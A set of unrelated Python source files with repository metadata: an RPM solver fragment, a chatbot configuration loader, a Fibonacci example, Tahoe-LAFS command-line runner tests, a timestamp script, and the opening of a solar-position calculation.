if o in ("-r", "--recursive"):
recursive = 1
if o in ("-s", "--solve"):
solve_dir = a
if o in ("-c", "--check"):
check_only = 1
if o in ("-y", "--yes"):
yes_solve = 1
if o in ("-k", "--pdk"):
pdk_output = 1
if o in ("-w", "--work"):
work_dir = a
if verbose > 1: print "WARNING: Excessive debugging"
process(rpm_dir, solve_dir, yes_solve, check_only, recursive, progress, verbose, pdk_output, work_dir)
if __name__ == "__main__":
main()
# vim:set ai et sts=4 sw=4 tw=80:
|
blipvert/rpmstrap
|
tools/rpm_solver.py
|
Python
|
gpl-2.0
| 14,705
|
import logging
import os
from pathlib import Path
from pydoc import locate
import re
import threading
from jsonschema import validate
import yaml
from Legobot.Lego import Lego
DIR = Path(__file__).resolve().parent
HELP_PATH = 'Legobot.Legos.Help.Help'
def build_logger(log_file=None, level=None):
if (
not level
or not isinstance(level, str)
or level.upper() not in ['INFO', 'DEBUG', 'ERROR']
):
level = 'DEBUG'
level = getattr(logging, level.upper())
if log_file:
logging.basicConfig(filename=log_file)
logger = logging.getLogger()
logger.setLevel(level)
ch = logging.StreamHandler()
ch.setLevel(level)
# create formatter and add it to the handlers
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(ch)
return logger
def load_yaml_file(path, default=None, raise_ex=None, logger=None):
if not logger:
logger = build_logger()
if not isinstance(path, Path):
path = Path(path)
try:
with path.open() as f:
out = yaml.safe_load(f)
logger.debug(f'Loaded {path} successfully.')
except Exception as e:
out = default
if raise_ex is True:
raise(e)
else:
logger.error(f'Error loading {path}:\n {e}\nReturning default.')
return out
def replace_vars(data):
if isinstance(data, dict):
for k, v in data.items():
data[k] = replace_vars(v)
elif isinstance(data, list):
for i in range(len(data)):
data[i] = replace_vars(data[i])
elif isinstance(data, str):
for var in re.findall(r'\$\{\{[a-zA-Z0-9._:, -]+\}\}', data):
var_items = var[3:-2].split('::')
var_str = var_items.pop(-1)
for cmd in reversed(var_items):
if cmd == 'ENV':
var_str = os.environ.get(var_str, var_str)
elif cmd == 'LIST':
var_str = [v.strip() for v in var_str.split(',')]
var_str = replace_vars(var_str)
if isinstance(var_str, list):
data = var_str
else:
data = data.replace(var, var_str)
return data
class Chatbot(object):
def __init__(self, config_path=None):
self.schema = load_yaml_file(
DIR.joinpath('chatbot_schema.yaml'), raise_ex=True)
self.config = self.load_config(config_path)
self.logger = build_logger(
self.config.get('log_file'), self.config.get('log_level'))
self.baseplate = None
self.baseplate_proxy = None
self.connectors = []
self.legos = []
def load_config(self, config_path):
config = load_yaml_file(config_path, raise_ex=True)
config = replace_vars(config)
validate(config, self.schema)
return config
def initialize_baseplate(self):
lock = threading.Lock()
self.baseplate = Lego.start(None, lock)
self.baseplate_proxy = self.baseplate.proxy()
def add_lego(self, name, config, lego_type):
if config['enabled'] is True:
try:
self.baseplate_proxy.add_child(
locate(config['path']), **config.get('kwargs', {}))
if lego_type == 'connectors':
self.connectors.append(name)
elif lego_type == 'legos':
self.legos.append(name)
except Exception as e:
self.logger.error(f'Error adding {name} to {lego_type}: {e}')
def run(self):
if not self.baseplate:
self.initialize_baseplate()
if self.config['helpEnabled'] is True:
self.add_lego(
'Help', {'enabled': True, 'path': HELP_PATH}, 'legos')
for connector, config in self.config['connectors'].items():
self.add_lego(connector, config, 'connectors')
for lego, config in self.config['legos'].items():
self.add_lego(lego, config, 'legos')
def stop(self):
self.baseplate.stop()
self.baseplate_proxy = None
self.baseplate = None
|
bbriggs/Legobot
|
Legobot/Chatbot.py
|
Python
|
gpl-2.0
| 4,280
|
def fib():
a, b = 0, 1
while True:
yield a
a, b = b, a+b
f = fib()
for i in range(10): # print the first ten Fibonacci numbers
print f.next(), # 0 1 1 2 3 5 8 13 21 34
####################
# loop through a generator
for item in function_that_returns_a_generator(param1, param2):
print item
|
jabbalaci/PrimCom
|
data/python/my_generator.py
|
Python
|
gpl-2.0
| 332
|
from twisted.trial import unittest
from twisted.python import usage, runtime
from twisted.internet import threads
import os.path, re, sys, subprocess
from cStringIO import StringIO
from allmydata.util import fileutil, pollmixin
from allmydata.util.encodingutil import unicode_to_argv, unicode_to_output, get_filesystem_encoding
from allmydata.scripts import runner
from allmydata.test import common_util
import allmydata
timeout = 240
def get_root_from_file(src):
srcdir = os.path.dirname(os.path.dirname(os.path.normcase(os.path.realpath(src))))
root = os.path.dirname(srcdir)
if os.path.basename(srcdir) == 'site-packages':
if re.search(r'python.+\..+', os.path.basename(root)):
root = os.path.dirname(root)
root = os.path.dirname(root)
elif os.path.basename(root) == 'src':
root = os.path.dirname(root)
return root
srcfile = allmydata.__file__
rootdir = get_root_from_file(srcfile)
if hasattr(sys, 'frozen'):
bintahoe = os.path.join(rootdir, 'tahoe')
if sys.platform == "win32" and os.path.exists(bintahoe + '.exe'):
bintahoe += '.exe'
else:
bintahoe = os.path.join(rootdir, 'bin', 'tahoe')
if sys.platform == "win32":
bintahoe += '.pyscript'
if not os.path.exists(bintahoe):
alt_bintahoe = os.path.join(rootdir, 'Scripts', 'tahoe.pyscript')
if os.path.exists(alt_bintahoe):
bintahoe = alt_bintahoe
class RunBinTahoeMixin:
def skip_if_cannot_run_bintahoe(self):
if not os.path.exists(bintahoe):
raise unittest.SkipTest("The bin/tahoe script isn't to be found in the expected location (%s), and I don't want to test a 'tahoe' executable that I find somewhere else, in case it isn't the right executable for this version of Tahoe. Perhaps running 'setup.py build' again will help." % (bintahoe,))
def skip_if_cannot_daemonize(self):
self.skip_if_cannot_run_bintahoe()
if runtime.platformType == "win32":
# twistd on windows doesn't daemonize. cygwin should work normally.
raise unittest.SkipTest("twistd does not fork under windows")
def run_bintahoe(self, args, stdin=None, python_options=[], env=None):
self.skip_if_cannot_run_bintahoe()
if hasattr(sys, 'frozen'):
if python_options:
raise unittest.SkipTest("This test doesn't apply to frozen builds.")
command = [bintahoe] + args
else:
command = [sys.executable] + python_options + [bintahoe] + args
if stdin is None:
stdin_stream = None
else:
stdin_stream = subprocess.PIPE
def _run():
p = subprocess.Popen(command, stdin=stdin_stream, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
(out, err) = p.communicate(stdin)
return (out, err, p.returncode)
return threads.deferToThread(_run)
class BinTahoe(common_util.SignalMixin, unittest.TestCase, RunBinTahoeMixin):
def _check_right_code(self, file_to_check):
root_to_check = get_root_from_file(file_to_check)
if os.path.basename(root_to_check) == 'dist':
root_to_check = os.path.dirname(root_to_check)
cwd = os.path.normcase(os.path.realpath("."))
root_from_cwd = os.path.dirname(cwd)
if os.path.basename(root_from_cwd) == 'src':
root_from_cwd = os.path.dirname(root_from_cwd)
same = (root_from_cwd == root_to_check)
if not same:
try:
same = os.path.samefile(root_from_cwd, root_to_check)
except AttributeError, e:
e # hush pyflakes
if not same:
msg = ("We seem to be testing the code at %r,\n"
"(according to the source filename %r),\n"
"but expected to be testing the code at %r.\n"
% (root_to_check, file_to_check, root_from_cwd))
root_from_cwdu = os.path.dirname(os.path.normcase(os.path.normpath(os.getcwdu())))
if os.path.basename(root_from_cwdu) == u'src':
root_from_cwdu = os.path.dirname(root_from_cwdu)
if not isinstance(root_from_cwd, unicode) and root_from_cwd.decode(get_filesystem_encoding(), 'replace') != root_from_cwdu:
msg += ("However, this may be a false alarm because the current directory path\n"
"is not representable in the filesystem encoding. Please run the tests\n"
"from the root of the Tahoe-LAFS distribution at a non-Unicode path.")
raise unittest.SkipTest(msg)
else:
msg += "Please run the tests from the root of the Tahoe-LAFS distribution."
self.fail(msg)
def test_the_right_code(self):
self._check_right_code(srcfile)
def test_import_in_repl(self):
d = self.run_bintahoe(["debug", "repl"],
stdin="import allmydata; print; print allmydata.__file__")
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0, str(res))
lines = out.splitlines()
self.failUnlessIn('>>>', lines[0], str(res))
self._check_right_code(lines[1])
d.addCallback(_cb)
return d
def test_path(self):
d = self.run_bintahoe(["--version-and-path"])
def _cb(res):
from allmydata import normalized_version
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0, str(res))
# Fail unless the allmydata-tahoe package is *this* version *and*
# was loaded from *this* source directory.
required_verstr = str(allmydata.__version__)
self.failIfEqual(required_verstr, "unknown",
"We don't know our version, because this distribution didn't come "
"with a _version.py and 'setup.py darcsver' hasn't been run.")
srcdir = os.path.dirname(os.path.dirname(os.path.normcase(os.path.realpath(srcfile))))
info = (res, allmydata.__appname__, required_verstr, srcdir)
appverpath = out.split(')')[0]
(appver, path) = appverpath.split(' (')
(app, ver) = appver.split(': ')
self.failUnlessEqual(app, allmydata.__appname__, info)
self.failUnlessEqual(normalized_version(ver), normalized_version(required_verstr), info)
self.failUnlessEqual(path, srcdir, info)
d.addCallback(_cb)
return d
def test_unicode_arguments_and_output(self):
self.skip_if_cannot_run_bintahoe()
tricky = u"\u2621"
try:
tricky_arg = unicode_to_argv(tricky, mangle=True)
tricky_out = unicode_to_output(tricky)
except UnicodeEncodeError:
raise unittest.SkipTest("A non-ASCII argument/output could not be encoded on this platform.")
d = self.run_bintahoe([tricky_arg])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 1, str(res))
self.failUnlessIn("Unknown command: "+tricky_out, out)
d.addCallback(_cb)
return d
def test_run_with_python_options(self):
# -t is a harmless option that warns about tabs.
d = self.run_bintahoe(["--version"], python_options=["-t"])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0, str(res))
self.failUnless(out.startswith(allmydata.__appname__+':'), str(res))
d.addCallback(_cb)
return d
def test_version_no_noise(self):
self.skip_if_cannot_run_bintahoe()
from allmydata import get_package_versions, normalized_version
twisted_ver = get_package_versions()['Twisted']
if not normalized_version(twisted_ver) >= normalized_version('9.0.0'):
raise unittest.SkipTest("We pass this test only with Twisted >= v9.0.0")
d = self.run_bintahoe(["--version"])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0, str(res))
self.failUnless(out.startswith(allmydata.__appname__+':'), str(res))
self.failIfIn("DeprecationWarning", out, str(res))
errlines = err.split("\n")
self.failIf([True for line in errlines if (line != "" and "UserWarning: Unbuilt egg for setuptools" not in line
and "from pkg_resources import load_entry_point" not in line)], str(res))
if err != "":
raise unittest.SkipTest("This test is known not to pass on Ubuntu Lucid; see #1235.")
d.addCallback(_cb)
return d
class CreateNode(unittest.TestCase):
# exercise "tahoe create-node", create-introducer,
# create-key-generator, and create-stats-gatherer, by calling the
# corresponding code as a subroutine.
def workdir(self, name):
basedir = os.path.join("test_runner", "CreateNode", name)
fileutil.make_dirs(basedir)
return basedir
def run_tahoe(self, argv):
out,err = StringIO(), StringIO()
rc = runner.runner(argv, stdout=out, stderr=err)
return rc, out.getvalue(), err.getvalue()
def do_create(self, kind):
basedir = self.workdir("test_" + kind)
command = "create-" + kind
is_client = kind in ("node", "client")
tac = is_client and "tahoe-client.tac" or ("tahoe-" + kind + ".tac")
n1 = os.path.join(basedir, command + "-n1")
argv = ["--quiet", command, "--basedir", n1]
rc, out, err = self.run_tahoe(argv)
self.failUnlessEqual(err, "")
self.failUnlessEqual(out, "")
self.failUnlessEqual(rc, 0)
self.failUnless(os.path.exists(n1))
self.failUnless(os.path.exists(os.path.join(n1, tac)))
if is_client:
# tahoe.cfg should exist, and should have storage enabled for
# 'create-node', and disabled for 'create-client'.
tahoe_cfg = os.path.join(n1, "tahoe.cfg")
self.failUnless(os.path.exists(tahoe_cfg))
content = open(tahoe_cfg).read()
if kind == "client":
self.failUnless(re.search(r"\n\[storage\]\n#.*\nenabled = false\n", content), content)
else:
self.failUnless(re.search(r"\n\[storage\]\n#.*\nenabled = true\n", content), content)
self.failUnless("\nreserved_space = 1G\n" in content)
# creating the node a second time should be rejected
rc, out, err = self.run_tahoe(argv)
self.failIfEqual(rc, 0, str((out, err, rc)))
self.failUnlessEqual(out, "")
self.failUnless("is not empty." in err)
# Fail if there is a non-empty line that doesn't end with a
# punctuation mark.
for line in err.splitlines():
self.failIf(re.search("[\S][^\.!?]$", line), (line,))
# test that the non --basedir form works too
n2 = os.path.join(basedir, command + "-n2")
argv = ["--quiet", command, n2]
rc, out, err = self.run_tahoe(argv)
self.failUnlessEqual(err, "")
self.failUnlessEqual(out, "")
self.failUnlessEqual(rc, 0)
self.failUnless(os.path.exists(n2))
self.failUnless(os.path.exists(os.path.join(n2, tac)))
# test the --node-directory form
n3 = os.path.join(basedir, command + "-n3")
argv = ["--quiet", command, "--node-directory", n3]
rc, out, err = self.run_tahoe(argv)
self.failUnlessEqual(err, "")
self.failUnlessEqual(out, "")
self.failUnlessEqual(rc, 0)
self.failUnless(os.path.exists(n3))
self.failUnless(os.path.exists(os.path.join(n3, tac)))
# make sure it rejects too many arguments
argv = [command, "basedir", "extraarg"]
self.failUnlessRaises(usage.UsageError,
runner.runner, argv,
run_by_human=False)
# when creating a non-client, there is no default for the basedir
if not is_client:
argv = [command]
self.failUnlessRaises(usage.UsageError,
runner.runner, argv,
run_by_human=False)
def test_node(self):
self.do_create("node")
def test_client(self):
# create-client should behave like create-node --no-storage.
self.do_create("client")
def test_introducer(self):
self.do_create("introducer")
def test_key_generator(self):
self.do_create("key-generator")
def test_stats_gatherer(self):
self.do_create("stats-gatherer")
def test_subcommands(self):
# no arguments should trigger a command listing, via UsageError
self.failUnlessRaises(usage.UsageError,
runner.runner,
[],
run_by_human=False)
class RunNode(common_util.SignalMixin, unittest.TestCase, pollmixin.PollMixin,
RunBinTahoeMixin):
# exercise "tahoe start", for both introducer, client node, and
# key-generator, by spawning "tahoe start" as a subprocess. This doesn't
# get us figleaf-based line-level coverage, but it does a better job of
# confirming that the user can actually run "./bin/tahoe start" and
# expect it to work. This verifies that bin/tahoe sets up PYTHONPATH and
# the like correctly.
# This doesn't work on cygwin (it hangs forever), so we skip this test
# when we're on cygwin. It is likely that "tahoe start" itself doesn't
# work on cygwin: twisted seems unable to provide a version of
# spawnProcess which really works there.
def workdir(self, name):
basedir = os.path.join("test_runner", "RunNode", name)
fileutil.make_dirs(basedir)
return basedir
def test_introducer(self):
self.skip_if_cannot_daemonize()
basedir = self.workdir("test_introducer")
c1 = os.path.join(basedir, "c1")
HOTLINE_FILE = os.path.join(c1, "suicide_prevention_hotline")
TWISTD_PID_FILE = os.path.join(c1, "twistd.pid")
INTRODUCER_FURL_FILE = os.path.join(c1, "introducer.furl")
d = self.run_bintahoe(["--quiet", "create-introducer", "--basedir", c1])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0)
# by writing this file, we get ten seconds before the node will
# exit. This insures that even if the test fails (and the 'stop'
# command doesn't work), the client should still terminate.
open(HOTLINE_FILE, "w").write("")
# now it's safe to start the node
d.addCallback(_cb)
def _then_start_the_node(res):
return self.run_bintahoe(["--quiet", "start", c1])
d.addCallback(_then_start_the_node)
def _cb2(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent (twistd) has exited. However, twistd writes the pid
# from the child, not the parent, so we can't expect twistd.pid
# to exist quite yet.
# the node is running, but it might not have made it past the
# first reactor turn yet, and if we kill it too early, it won't
# remove the twistd.pid file. So wait until it does something
# that we know it won't do until after the first turn.
d.addCallback(_cb2)
def _node_has_started():
return os.path.exists(INTRODUCER_FURL_FILE)
d.addCallback(lambda res: self.poll(_node_has_started))
def _started(res):
open(HOTLINE_FILE, "w").write("")
self.failUnless(os.path.exists(TWISTD_PID_FILE))
# rm this so we can detect when the second incarnation is ready
os.unlink(INTRODUCER_FURL_FILE)
return self.run_bintahoe(["--quiet", "restart", c1])
d.addCallback(_started)
def _then(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
d.addCallback(_then)
# again, the second incarnation of the node might not be ready yet,
# so poll until it is
d.addCallback(lambda res: self.poll(_node_has_started))
# now we can kill it. TODO: On a slow machine, the node might kill
# itself before we get a chance too, especially if spawning the
# 'tahoe stop' command takes a while.
def _stop(res):
open(HOTLINE_FILE, "w").write("")
self.failUnless(os.path.exists(TWISTD_PID_FILE))
return self.run_bintahoe(["--quiet", "stop", c1])
d.addCallback(_stop)
def _after_stopping(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
# the parent has exited by now
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent was supposed to poll and wait until it sees
# twistd.pid go away before it exits, so twistd.pid should be
# gone by now.
self.failIf(os.path.exists(TWISTD_PID_FILE))
d.addCallback(_after_stopping)
def _remove_hotline(res):
os.unlink(HOTLINE_FILE)
return res
d.addBoth(_remove_hotline)
return d
test_introducer.timeout = 960
# This test hit the 120-second timeout on "Francois Lenny-armv5tel", then it hit a 240-second timeout on our feisty2.5 buildslave: http://allmydata.org/buildbot/builders/feisty2.5/builds/2381/steps/test/logs/test.log
# Then it hit the 480 second timeout on Francois's machine: http://tahoe-lafs.org/buildbot/builders/FranXois%20lenny-armv5tel/builds/449/steps/test/logs/stdio
def test_client_no_noise(self):
self.skip_if_cannot_daemonize()
from allmydata import get_package_versions, normalized_version
twisted_ver = get_package_versions()['Twisted']
if not normalized_version(twisted_ver) >= normalized_version('9.0.0'):
raise unittest.SkipTest("We pass this test only with Twisted >= v9.0.0")
basedir = self.workdir("test_client_no_noise")
c1 = os.path.join(basedir, "c1")
HOTLINE_FILE = os.path.join(c1, "suicide_prevention_hotline")
TWISTD_PID_FILE = os.path.join(c1, "twistd.pid")
PORTNUMFILE = os.path.join(c1, "client.port")
d = self.run_bintahoe(["--quiet", "create-client", "--basedir", c1, "--webport", "0"])
def _cb(res):
out, err, rc_or_sig = res
errstr = "cc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
assert rc_or_sig == 0, errstr
self.failUnlessEqual(rc_or_sig, 0)
# By writing this file, we get forty seconds before the client will exit. This insures
# that even if the 'stop' command doesn't work (and the test fails), the client should
# still terminate.
open(HOTLINE_FILE, "w").write("")
open(os.path.join(c1, "introducer.furl"), "w").write("pb://xrndsskn2zuuian5ltnxrte7lnuqdrkz@127.0.0.1:55617/introducer\n")
# now it's safe to start the node
d.addCallback(_cb)
def _start(res):
return self.run_bintahoe(["--quiet", "start", c1])
d.addCallback(_start)
def _cb2(res):
out, err, rc_or_sig = res
errstr = "cc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
open(HOTLINE_FILE, "w").write("")
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr) # If you emit noise, you fail this test.
errlines = err.split("\n")
self.failIf([True for line in errlines if (line != "" and "UserWarning: Unbuilt egg for setuptools" not in line
and "from pkg_resources import load_entry_point" not in line)], errstr)
if err != "":
raise unittest.SkipTest("This test is known not to pass on Ubuntu Lucid; see #1235.")
# the parent (twistd) has exited. However, twistd writes the pid
# from the child, not the parent, so we can't expect twistd.pid
# to exist quite yet.
# the node is running, but it might not have made it past the
# first reactor turn yet, and if we kill it too early, it won't
# remove the twistd.pid file. So wait until it does something
# that we know it won't do until after the first turn.
d.addCallback(_cb2)
def _node_has_started():
return os.path.exists(PORTNUMFILE)
d.addCallback(lambda res: self.poll(_node_has_started))
# now we can kill it. TODO: On a slow machine, the node might kill
# itself before we get a chance to, especially if spawning the
# 'tahoe stop' command takes a while.
def _stop(res):
self.failUnless(os.path.exists(TWISTD_PID_FILE), (TWISTD_PID_FILE, os.listdir(os.path.dirname(TWISTD_PID_FILE))))
return self.run_bintahoe(["--quiet", "stop", c1])
d.addCallback(_stop)
return d
def test_client(self):
self.skip_if_cannot_daemonize()
basedir = self.workdir("test_client")
c1 = os.path.join(basedir, "c1")
HOTLINE_FILE = os.path.join(c1, "suicide_prevention_hotline")
TWISTD_PID_FILE = os.path.join(c1, "twistd.pid")
PORTNUMFILE = os.path.join(c1, "client.port")
d = self.run_bintahoe(["--quiet", "create-node", "--basedir", c1, "--webport", "0"])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0)
# By writing this file, we get sixty seconds before the client will exit. This insures
# that even if the 'stop' command doesn't work (and the test fails), the client should
# still terminate.
open(HOTLINE_FILE, "w").write("")
open(os.path.join(c1, "introducer.furl"), "w").write("pb://xrndsskn2zuuian5ltnxrte7lnuqdrkz@127.0.0.1:55617/introducer\n")
# now it's safe to start the node
d.addCallback(_cb)
def _start(res):
return self.run_bintahoe(["--quiet", "start", c1])
d.addCallback(_start)
def _cb2(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent (twistd) has exited. However, twistd writes the pid
# from the child, not the parent, so we can't expect twistd.pid
# to exist quite yet.
# the node is running, but it might not have made it past the
# first reactor turn yet, and if we kill it too early, it won't
# remove the twistd.pid file. So wait until it does something
# that we know it won't do until after the first turn.
d.addCallback(_cb2)
def _node_has_started():
return os.path.exists(PORTNUMFILE)
d.addCallback(lambda res: self.poll(_node_has_started))
def _started(res):
open(HOTLINE_FILE, "w").write("")
self.failUnless(os.path.exists(TWISTD_PID_FILE))
# rm this so we can detect when the second incarnation is ready
os.unlink(PORTNUMFILE)
return self.run_bintahoe(["--quiet", "restart", c1])
d.addCallback(_started)
def _cb3(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
d.addCallback(_cb3)
# again, the second incarnation of the node might not be ready yet,
# so poll until it is
d.addCallback(lambda res: self.poll(_node_has_started))
# now we can kill it. TODO: On a slow machine, the node might kill
# itself before we get a chance too, especially if spawning the
# 'tahoe stop' command takes a while.
def _stop(res):
open(HOTLINE_FILE, "w").write("")
self.failUnless(os.path.exists(TWISTD_PID_FILE), (TWISTD_PID_FILE, os.listdir(os.path.dirname(TWISTD_PID_FILE))))
return self.run_bintahoe(["--quiet", "stop", c1])
d.addCallback(_stop)
def _cb4(res):
out, err, rc_or_sig = res
open(HOTLINE_FILE, "w").write("")
# the parent has exited by now
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent was supposed to poll and wait until it sees
# twistd.pid go away before it exits, so twistd.pid should be
# gone by now.
self.failIf(os.path.exists(TWISTD_PID_FILE))
d.addCallback(_cb4)
def _remove_hotline(res):
os.unlink(HOTLINE_FILE)
return res
d.addBoth(_remove_hotline)
return d
def test_baddir(self):
self.skip_if_cannot_daemonize()
basedir = self.workdir("test_baddir")
fileutil.make_dirs(basedir)
d = self.run_bintahoe(["--quiet", "start", "--basedir", basedir])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 1)
self.failUnless("does not look like a node directory" in err, err)
d.addCallback(_cb)
def _then_stop_it(res):
return self.run_bintahoe(["--quiet", "stop", "--basedir", basedir])
d.addCallback(_then_stop_it)
def _cb2(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 2)
self.failUnless("does not look like a running node directory" in err)
d.addCallback(_cb2)
def _then_start_in_bogus_basedir(res):
not_a_dir = os.path.join(basedir, "bogus")
return self.run_bintahoe(["--quiet", "start", "--basedir", not_a_dir])
d.addCallback(_then_start_in_bogus_basedir)
def _cb3(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 1)
self.failUnless("does not look like a directory at all" in err, err)
d.addCallback(_cb3)
return d
def test_keygen(self):
self.skip_if_cannot_daemonize()
basedir = self.workdir("test_keygen")
c1 = os.path.join(basedir, "c1")
TWISTD_PID_FILE = os.path.join(c1, "twistd.pid")
KEYGEN_FURL_FILE = os.path.join(c1, "key_generator.furl")
d = self.run_bintahoe(["--quiet", "create-key-generator", "--basedir", c1])
def _cb(res):
out, err, rc_or_sig = res
self.failUnlessEqual(rc_or_sig, 0)
d.addCallback(_cb)
def _start(res):
return self.run_bintahoe(["--quiet", "start", c1])
d.addCallback(_start)
def _cb2(res):
out, err, rc_or_sig = res
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent (twistd) has exited. However, twistd writes the pid
# from the child, not the parent, so we can't expect twistd.pid
# to exist quite yet.
# the node is running, but it might not have made it past the
# first reactor turn yet, and if we kill it too early, it won't
# remove the twistd.pid file. So wait until it does something
# that we know it won't do until after the first turn.
d.addCallback(_cb2)
def _node_has_started():
return os.path.exists(KEYGEN_FURL_FILE)
d.addCallback(lambda res: self.poll(_node_has_started))
def _started(res):
self.failUnless(os.path.exists(TWISTD_PID_FILE))
# rm this so we can detect when the second incarnation is ready
os.unlink(KEYGEN_FURL_FILE)
return self.run_bintahoe(["--quiet", "restart", c1])
d.addCallback(_started)
def _cb3(res):
out, err, rc_or_sig = res
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
d.addCallback(_cb3)
# again, the second incarnation of the node might not be ready yet,
# so poll until it is
d.addCallback(lambda res: self.poll(_node_has_started))
# now we can kill it. TODO: On a slow machine, the node might kill
# itself before we get a chance too, especially if spawning the
# 'tahoe stop' command takes a while.
def _stop(res):
self.failUnless(os.path.exists(TWISTD_PID_FILE))
return self.run_bintahoe(["--quiet", "stop", c1])
d.addCallback(_stop)
def _cb4(res):
out, err, rc_or_sig = res
# the parent has exited by now
errstr = "rc=%d, OUT: '%s', ERR: '%s'" % (rc_or_sig, out, err)
self.failUnlessEqual(rc_or_sig, 0, errstr)
self.failUnlessEqual(out, "", errstr)
# self.failUnlessEqual(err, "", errstr) # See test_client_no_noise -- for now we ignore noise.
# the parent was supposed to poll and wait until it sees
# twistd.pid go away before it exits, so twistd.pid should be
# gone by now.
self.failIf(os.path.exists(TWISTD_PID_FILE))
d.addCallback(_cb4)
return d
|
drewp/tahoe-lafs
|
src/allmydata/test/test_runner.py
|
Python
|
gpl-2.0
| 31,464
|
import datetime, time
print time.mktime(datetime.datetime.now().timetuple()) * 1000
|
spicyramen/sipLocator
|
tools/testTimeEpoch.py
|
Python
|
gpl-2.0
| 85
|
from math import sin, cos, pi, atan2, atan, asin, tan
def sun_pos(dd):
'''This routine is a truncated version of Newcomb's Sun and
is designed to give apparent angular coordinates (T.E.D) to a
precision of one second of time.
Translated from SSW (IDL) routine of the same name
'''
dtor = pi/180.
# Form time in Julian centuries from 1900.0
t = dd/36525.0
# Form sun's mean longitude
l = (279.696678+((36000.768925*t) % 360.0))*3600.0
# Allow for ellipticity of the orbit (equation of centre)
# using the Earth's mean anomoly ME
me = 358.475844 + ((35999.049750*t) % 360.0)
ellcor = (6910.1 - 17.2*t)*sin(me*dtor) + 72.3*sin(2.0*me*dtor)
l = l + ellcor
# Allow for the Venus perturbations using the mean anomaly of Venus MV
mv = 212.603219 + ((58517.803875*t) % 360.0)
vencorr = 4.8 * cos((299.1017 + mv - me)*dtor) + \
5.5 * cos((148.3133 + 2.0 * mv - 2.0 * me )*dtor) + \
2.5 * cos((315.9433 + 2.0 * mv - 3.0 * me )*dtor) + \
1.6 * cos((345.2533 + 3.0 * mv - 4.0 * me )*dtor) + \
1.0 * cos((318.15 + 3.0 * mv - 5.0 * me )*dtor)
l = l + vencorr
# Allow for the Mars perturbations using the mean anomaly of Mars MM
mm = 319.529425 + (( 19139.858500 * t) % 360.0 )
marscorr = 2.0 * cos((343.8883 - 2.0 * mm + 2.0 * me)*dtor ) + \
1.8 * cos((200.4017 - 2.0 * mm + me)*dtor)
l = l + marscorr
# Allow for the Jupiter perturbations using the mean anomaly of
# Jupiter MJ
mj = 225.328328 + (( 3034.6920239 * t) % 360.0 )
jupcorr = 7.2 * cos(( 179.5317 - mj + me )*dtor) + \
2.6 * cos((263.2167 - mj )*dtor) + \
2.7 * cos(( 87.1450 - 2.0 * mj + 2.0 * me)*dtor) + \
1.6 * cos((109.4933 - 2.0 * mj + me )*dtor)
l = l + jupcorr
# Allow for the Moon's perturbations using the mean elongation of
# the Moon from the Sun D
d = 350.7376814 + (( 445267.11422 * t) % 360.0 )
mooncorr = 6.5 * sin(d*dtor)
l = l + mooncorr
# Allow for long period terms
longterm = + 6.4 * sin(( 231.19 + 20.20 * t )*dtor)
